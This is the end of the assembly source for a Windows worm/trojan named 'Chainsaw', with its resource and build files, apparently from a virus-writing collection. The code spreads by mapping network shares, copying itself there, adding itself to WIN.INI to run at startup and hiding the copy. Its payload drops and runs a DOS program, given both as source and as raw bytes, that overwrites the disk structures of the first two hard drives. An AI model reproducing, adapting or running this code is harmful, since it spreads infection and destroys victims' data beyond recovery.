; SubSeven, even though it's the one of the most advanched RAT's
; available these days, it is programmed pretty badly, the author
; clearly has no understanding of TCP/IP whatsoever, he doesn't
; even terminate his TCP commands with a terminator for example,
; which will lead to fragmented packets fucking up. Also, when you
; supply wrong commands to the server, it will downright hang itself.
; And as a bonus, SubSeven infected systems become slooow, not sure
; exactly why.. I'd say, leave writing RAT's to people who know
; their stuff, like the authors of Back Orifice 2000.
; Recursively scans the host's resources for shared drives.
Locate_Shares:
PUSHAD
PUSH OFFSET Enum_Handle ; Start enumerating all
PUSH OFFSET Net_Resource ; shared drives.
PUSH 0
PUSH RESOURCETYPE_DISK
PUSH RESOURCE_GLOBALNET
CALL WNetOpenEnumA
OR EAX, EAX
JNZ Exit_Loc_Share
MOV EBX, Enum_Handle
Enum_Resource: MOV Net_Struc_Count, 1
PUSH OFFSET Enum_Buf_Size ; Find shared drive.
PUSH OFFSET Net_Resource
PUSH OFFSET Net_Struc_Count
PUSH EBX
CALL WNetEnumResourceA
OR EAX, EAX
JNZ Close_Enum
CMP Net_Usage, RESOURCEUSAGE_CONTAINER
JNE Infect_Share
CALL Locate_Shares
JMP Enum_Resource
Infect_Share: MOV Net_Local_Name, OFFSET Remote_Drive
PUSH 0 ; Map the shared drive to
PUSH 0 ; 'T:'.
PUSH 0
PUSH OFFSET Net_Resource
CALL WNetAddConnection2A
OR EAX, EAX
JNZ Enum_Resource
PUSH 1 ; Copy Chainsaw.exe to the
PUSH OFFSET Remote_Trojan ; root of this shared drive.
PUSH OFFSET Own_Path
CALL CopyFileA
XCHG ECX, EAX
JECXZ Un_Map_Share
PUSH OFFSET MsDos_Sys ; Attempt to get the Win9x
PUSH 260 ; directory.
PUSH OFFSET Win_Dir
PUSH OFFSET Default_String
PUSH OFFSET Win_Dir_Key
PUSH OFFSET Paths_Section
CALL GetPrivateProfileStringA
XCHG ECX, EAX
JECXZ Un_Map_Share
LEA EDI, [Win_Dir+ECX] ; Append '\WIN.INI' to it.
MOV ESI, OFFSET Slash_Win_Ini
MOV ECX, 9
REP MOVSB
PUSH OFFSET Win_Dir ; Add 'run=\Chainsaw.exe' to
PUSH OFFSET Root_Dropper ; Win9x's WIN.INI.
PUSH OFFSET Win_Ini_Run_Key
PUSH OFFSET Windows_Section
CALL WritePrivateProfileStringA
XCHG ECX, EAX
JECXZ Un_Map_Share
PUSH FILE_ATTRIBUTE_HIDDEN ; Hide the drop file.
PUSH OFFSET Remote_Trojan
CALL SetFileAttributesA
Un_Map_Share: PUSH 0 ; Unmap shared drive.
PUSH 0
PUSH OFFSET Remote_Drive
CALL WNetCancelConnection2A
JMP Enum_Resource
Close_Enum: PUSH EBX
CALL WNetCloseEnum
Exit_Loc_Share: POPAD
RETN
; Ima go woop yo ass boy!
Payload:
PUSH 0
PUSH 0
PUSH CREATE_ALWAYS
PUSH 0
PUSH 0
PUSH GENERIC_WRITE
PUSH OFFSET Nuke_File
CALL CreateFileA
XCHG EBX, EAX
PUSH 0 ; Write bomb.
PUSH OFFSET Temp
PUSH 666
PUSH OFFSET DOS_Bomb
PUSH EBX
CALL WriteFile
PUSH EBX
CALL CloseHandle
PUSH 0 ; Run the bomb (only WinExec
PUSH OFFSET Nuke_File ; is capable of running DOS
CALL WinExec ; files too).
JMP $ ; Heart stops..
; Bomb in DOS COM-format, this way it works both on 95/98 and NT/2K.
; Smashes disk structures of 1st 2 fixed disks, should be fast and
; unrecoverable.
; .MODEL TINY
; .CODE
;
; ORG 100h
;START:
; MOV AX, 3513h ; Grab INT 13h's address.
; INT 21h
;
; MOV Int13h, BX ; Store it for later.
; MOV Int13h+2, ES
;
; PUSH CS
; POP ES
;
; XOR SI, SI
;
; MOV BX, OFFSET Trash_Text
; MOV CX, (End_Trash_Text-Trash_Text)
;
; ; Decrypt trash text.
;
;Decrypt_Text: XOR BYTE PTR [BX+SI], 66h
;
; INC SI
;
; LOOP Decrypt_Text
;
; INC CX ; CX = 0001h.
;
; MOV DX, 80h+1 ; Start trashing backwards
; ; from 2nd HDD.
;
;Kill_Head: MOV AX, 0302h ; Smash 2 sectors of track
; PUSHF ; 0 with our text.
; DB 9Ah
;Int13h DW 0, 0
;
; INC DH ; Smashed all heads?
; JNZ Kill_Head
;
; DEC DL ; Smashed all HDD's ?
; JS Kill_Head
;
;Exit: RETN ; Back to Windoze..
;
; DB 'T2' ; To pad this file to 666.
;
; ; XOR 66h encrypted:
;
; ; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE
; ; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR
; ; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL
; ; THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY
; ; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED
; ; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND
; ; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC
; ; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF
; ; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST
; ; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY,
; ; THE TEXAS CHAIN SAW MASSACRE..."
;
; ; (I adore this movie :)
;
;Trash_Text: DB 44h, 32h, 2Eh, 23h, 46h, 20h, 2Fh, 2Ah, 2Bh, 46h
; DB 31h, 2Eh, 2Fh, 25h, 2Eh, 46h, 3Fh, 29h, 33h, 46h
; DB 27h, 34h, 23h, 46h, 27h, 24h, 29h, 33h, 32h, 46h
; DB 32h, 29h, 46h, 35h, 23h, 23h, 46h, 2Fh, 35h, 46h
; DB 27h, 28h, 46h, 27h, 25h, 25h, 29h, 33h, 28h, 32h
; DB 46h, 29h, 20h, 46h, 32h, 2Eh, 23h, 6Bh, 6Ch, 32h
; DB 34h, 27h, 21h, 23h, 22h, 3Fh, 46h, 31h, 2Eh, 2Fh
; DB 25h, 2Eh, 46h, 24h, 23h, 20h, 23h, 2Ah, 2Ah, 46h
; DB 27h, 46h, 21h, 34h, 29h, 33h, 36h, 46h, 29h, 20h
; DB 46h, 20h, 2Fh, 30h, 23h, 46h, 3Fh, 29h, 33h, 32h
; DB 2Eh, 35h, 48h, 46h, 2Fh, 28h, 46h, 36h, 27h, 34h
; DB 32h, 2Fh, 25h, 33h, 2Ah, 27h, 34h, 6Bh, 6Ch, 35h
; DB 27h, 2Ah, 2Ah, 3Fh, 46h, 2Eh, 27h, 34h, 22h, 23h
; DB 35h, 32h, 3Fh, 46h, 27h, 28h, 22h, 46h, 2Eh, 23h
; DB 34h, 46h, 2Fh, 28h, 30h, 27h, 2Ah, 2Fh, 22h, 46h
; DB 24h, 34h, 29h, 32h, 2Eh, 23h, 34h, 46h, 20h, 34h
; DB 27h, 28h, 2Dh, 2Ah, 2Fh, 28h, 48h, 46h, 2Fh, 32h
; DB 46h, 2Fh, 35h, 46h, 27h, 2Ah, 2Ah, 6Bh, 6Ch, 32h
; DB 2Eh, 23h, 46h, 2Bh, 29h, 34h, 23h, 46h, 32h, 34h
; DB 27h, 21h, 2Fh, 25h, 46h, 2Fh, 28h, 46h, 32h, 2Eh
; DB 27h, 32h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h
; DB 34h, 23h, 46h, 3Fh, 29h, 33h, 28h, 21h, 48h, 46h
; DB 24h, 33h, 32h, 4Ah, 46h, 2Eh, 27h, 22h, 46h, 32h
; DB 2Eh, 23h, 3Fh, 6Bh, 6Ch, 2Ah, 2Fh, 30h, 23h, 22h
; DB 46h, 30h, 23h, 34h, 3Fh, 4Ah, 46h, 30h, 23h, 34h
; DB 3Fh, 46h, 2Ah, 29h, 28h, 21h, 46h, 2Ah, 2Fh, 30h
; DB 23h, 35h, 4Ah, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 25h
; DB 29h, 33h, 2Ah, 22h, 46h, 28h, 29h, 32h, 46h, 2Eh
; DB 27h, 30h, 23h, 46h, 23h, 3Eh, 36h, 23h, 25h, 32h
; DB 23h, 22h, 6Bh, 6Ch, 28h, 29h, 34h, 46h, 31h, 29h
; DB 33h, 2Ah, 22h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 2Eh
; DB 27h, 30h, 23h, 46h, 31h, 2Fh, 35h, 2Eh, 23h, 22h
; DB 46h, 32h, 29h, 46h, 35h, 23h, 23h, 46h, 27h, 35h
; DB 46h, 2Bh, 33h, 25h, 2Eh, 46h, 29h, 20h, 46h, 32h
; DB 2Eh, 23h, 46h, 2Bh, 27h, 22h, 46h, 27h, 28h, 22h
; DB 6Bh, 6Ch, 2Bh, 27h, 25h, 27h, 24h, 34h, 23h, 46h
; DB 27h, 35h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h
; DB 34h, 23h, 46h, 32h, 29h, 46h, 35h, 23h, 23h, 46h
; DB 32h, 2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 48h, 46h
; DB 20h, 29h, 34h, 46h, 32h, 2Eh, 23h, 2Bh, 46h, 27h
; DB 28h, 46h, 2Fh, 22h, 3Fh, 2Ah, 2Ah, 2Fh, 25h, 6Bh
; DB 6Ch, 35h, 33h, 2Bh, 2Bh, 23h, 34h, 46h, 27h, 20h
; DB 32h, 23h, 34h, 28h, 29h, 29h, 28h, 46h, 22h, 34h
; DB 2Fh, 30h, 23h, 46h, 24h, 23h, 25h, 27h, 2Bh, 23h
; DB 46h, 27h, 46h, 28h, 2Fh, 21h, 2Eh, 32h, 2Bh, 27h
; DB 34h, 23h, 48h, 46h, 32h, 2Eh, 23h, 46h, 23h, 30h
; DB 23h, 28h, 32h, 35h, 46h, 29h, 20h, 6Bh, 6Ch, 32h
; DB 2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 46h, 31h, 23h
; DB 34h, 23h, 46h, 32h, 29h, 46h, 2Ah, 23h, 27h, 22h
; DB 46h, 32h, 29h, 46h, 32h, 2Eh, 23h, 46h, 22h, 2Fh
; DB 35h, 25h, 29h, 30h, 23h, 34h, 3Fh, 46h, 29h, 20h
; DB 46h, 29h, 28h, 23h, 46h, 29h, 20h, 46h, 32h, 2Eh
; DB 23h, 46h, 2Bh, 29h, 35h, 32h, 6Bh, 6Ch, 24h, 2Fh
; DB 3Ch, 27h, 34h, 34h, 23h, 46h, 25h, 34h, 2Fh, 2Bh
; DB 23h, 35h, 46h, 2Fh, 28h, 46h, 32h, 2Eh, 23h, 46h
; DB 27h, 28h, 28h, 27h, 2Ah, 35h, 46h, 29h, 20h, 46h
; DB 27h, 2Bh, 23h, 34h, 2Fh, 25h, 27h, 28h, 46h, 2Eh
; DB 2Fh, 35h, 32h, 29h, 34h, 3Fh, 4Ah, 6Bh, 6Ch, 32h
; DB 2Eh, 23h, 46h, 32h, 23h, 3Eh, 27h, 35h, 46h, 25h
; DB 2Eh, 27h, 2Fh, 28h, 46h, 35h, 27h, 31h, 46h, 2Bh
; DB 27h, 35h, 35h, 27h, 25h, 34h, 23h, 48h, 48h, 48h
; DB 44h, 6Bh, 6Ch
;End_Trash_Text:
; END START
DOS_Bomb: DB 0B8h, 013h, 035h, 0CDh, 021h, 089h, 01Eh, 026h, 001h
DB 08Ch, 006h, 028h, 001h, 00Eh, 007h, 033h, 0F6h, 0BBh
DB 035h, 001h, 0B9h, 065h, 002h, 080h, 030h, 066h, 046h
DB 0E2h, 0FAh, 041h, 0BAh, 081h, 000h, 0B8h, 002h, 003h
DB 09Ch, 09Ah, 000h, 000h, 000h, 000h, 0FEh, 0C6h, 075h
DB 0F3h, 0FEh, 0CAh, 078h, 0EFh, 0C3h, 054h, 032h, 044h
DB 032h, 02Eh, 023h, 046h, 020h, 02Fh, 02Ah, 02Bh, 046h
DB 031h, 02Eh, 02Fh, 025h, 02Eh, 046h, 03Fh, 029h, 033h
DB 046h, 027h, 034h, 023h, 046h, 027h, 024h, 029h, 033h
DB 032h, 046h, 032h, 029h, 046h, 035h, 023h, 023h, 046h
DB 02Fh, 035h, 046h, 027h, 028h, 046h, 027h, 025h, 025h
DB 029h, 033h, 028h, 032h, 046h, 029h, 020h, 046h, 032h
DB 02Eh, 023h, 06Bh, 06Ch, 032h, 034h, 027h, 021h, 023h
DB 022h, 03Fh, 046h, 031h, 02Eh, 02Fh, 025h, 02Eh, 046h
DB 024h, 023h, 020h, 023h, 02Ah, 02Ah, 046h, 027h, 046h
DB 021h, 034h, 029h, 033h, 036h, 046h, 029h, 020h, 046h
DB 020h, 02Fh, 030h, 023h, 046h, 03Fh, 029h, 033h, 032h
DB 02Eh, 035h, 048h, 046h, 02Fh, 028h, 046h, 036h, 027h
DB 034h, 032h, 02Fh, 025h, 033h, 02Ah, 027h, 034h, 06Bh
DB 06Ch, 035h, 027h, 02Ah, 02Ah, 03Fh, 046h, 02Eh, 027h
DB 034h, 022h, 023h, 035h, 032h, 03Fh, 046h, 027h, 028h
DB 022h, 046h, 02Eh, 023h, 034h, 046h, 02Fh, 028h, 030h
DB 027h, 02Ah, 02Fh, 022h, 046h, 024h, 034h, 029h, 032h
DB 02Eh, 023h, 034h, 046h, 020h, 034h, 027h, 028h, 02Dh
DB 02Ah, 02Fh, 028h, 048h, 046h, 02Fh, 032h, 046h, 02Fh
DB 035h, 046h, 027h, 02Ah, 02Ah, 06Bh, 06Ch, 032h, 02Eh
DB 023h, 046h, 02Bh, 029h, 034h, 023h, 046h, 032h, 034h
DB 027h, 021h, 02Fh, 025h, 046h, 02Fh, 028h, 046h, 032h
DB 02Eh, 027h, 032h, 046h, 032h, 02Eh, 023h, 03Fh, 046h
DB 031h, 023h, 034h, 023h, 046h, 03Fh, 029h, 033h, 028h
DB 021h, 048h, 046h, 024h, 033h, 032h, 04Ah, 046h, 02Eh
DB 027h, 022h, 046h, 032h, 02Eh, 023h, 03Fh, 06Bh, 06Ch
DB 02Ah, 02Fh, 030h, 023h, 022h, 046h, 030h, 023h, 034h
DB 03Fh, 04Ah, 046h, 030h, 023h, 034h, 03Fh, 046h, 02Ah
DB 029h, 028h, 021h, 046h, 02Ah, 02Fh, 030h, 023h, 035h
DB 04Ah, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 025h, 029h
DB 033h, 02Ah, 022h, 046h, 028h, 029h, 032h, 046h, 02Eh
DB 027h, 030h, 023h, 046h, 023h, 03Eh, 036h, 023h, 025h
DB 032h, 023h, 022h, 06Bh, 06Ch, 028h, 029h, 034h, 046h
DB 031h, 029h, 033h, 02Ah, 022h, 046h, 032h, 02Eh, 023h
DB 03Fh, 046h, 02Eh, 027h, 030h, 023h, 046h, 031h, 02Fh
DB 035h, 02Eh, 023h, 022h, 046h, 032h, 029h, 046h, 035h
DB 023h, 023h, 046h, 027h, 035h, 046h, 02Bh, 033h, 025h
DB 02Eh, 046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h
DB 02Bh, 027h, 022h, 046h, 027h, 028h, 022h, 06Bh, 06Ch
DB 02Bh, 027h, 025h, 027h, 024h, 034h, 023h, 046h, 027h
DB 035h, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 031h, 023h
DB 034h, 023h, 046h, 032h, 029h, 046h, 035h, 023h, 023h
DB 046h, 032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh
DB 048h, 046h, 020h, 029h, 034h, 046h, 032h, 02Eh, 023h
DB 02Bh, 046h, 027h, 028h, 046h, 02Fh, 022h, 03Fh, 02Ah
DB 02Ah, 02Fh, 025h, 06Bh, 06Ch, 035h, 033h, 02Bh, 02Bh
DB 023h, 034h, 046h, 027h, 020h, 032h, 023h, 034h, 028h
DB 029h, 029h, 028h, 046h, 022h, 034h, 02Fh, 030h, 023h
DB 046h, 024h, 023h, 025h, 027h, 02Bh, 023h, 046h, 027h
DB 046h, 028h, 02Fh, 021h, 02Eh, 032h, 02Bh, 027h, 034h
DB 023h, 048h, 046h, 032h, 02Eh, 023h, 046h, 023h, 030h
DB 023h, 028h, 032h, 035h, 046h, 029h, 020h, 06Bh, 06Ch
DB 032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh, 046h
DB 031h, 023h, 034h, 023h, 046h, 032h, 029h, 046h, 02Ah
DB 023h, 027h, 022h, 046h, 032h, 029h, 046h, 032h, 02Eh
DB 023h, 046h, 022h, 02Fh, 035h, 025h, 029h, 030h, 023h
DB 034h, 03Fh, 046h, 029h, 020h, 046h, 029h, 028h, 023h
DB 046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h, 02Bh
DB 029h, 035h, 032h, 06Bh, 06Ch, 024h, 02Fh, 03Ch, 027h
DB 034h, 034h, 023h, 046h, 025h, 034h, 02Fh, 02Bh, 023h
DB 035h, 046h, 02Fh, 028h, 046h, 032h, 02Eh, 023h, 046h
DB 027h, 028h, 028h, 027h, 02Ah, 035h, 046h, 029h, 020h
DB 046h, 027h, 02Bh, 023h, 034h, 02Fh, 025h, 027h, 028h
DB 046h, 02Eh, 02Fh, 035h, 032h, 029h, 034h, 03Fh, 04Ah
DB 06Bh, 06Ch, 032h, 02Eh, 023h, 046h, 032h, 023h, 03Eh
DB 027h, 035h, 046h, 025h, 02Eh, 027h, 02Fh, 028h, 046h
DB 035h, 027h, 031h, 046h, 02Bh, 027h, 035h, 035h, 027h
DB 025h, 034h, 023h, 048h, 048h, 048h, 044h, 06Bh, 06Ch
END START
; *shrug*, haven't really finished this piece-o-crap,
; mainly because I got fed up with all them bugs in
; the server programs.. also not sure if the NetBios
; shit works on remotes.. oh fuck it :|
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CHAINSAW.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CHAINSAW.RC]ÄÄÄ
I ICON DISCARDABLE "BLACK.ICO"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CHAINSAW.RC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Q.BAT]ÄÄÄ
TASM32 CHAINSAW.ASM /ml /m
TLINK32 CHAINSAW.OBJ C:\TASM\LIB\IMPORT32.LIB WININET.LIB -aa
BRC32 CHAINSAW.RC
UPX\UPX CHAINSAW.EXE --force
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Q.BAT]ÄÄÄ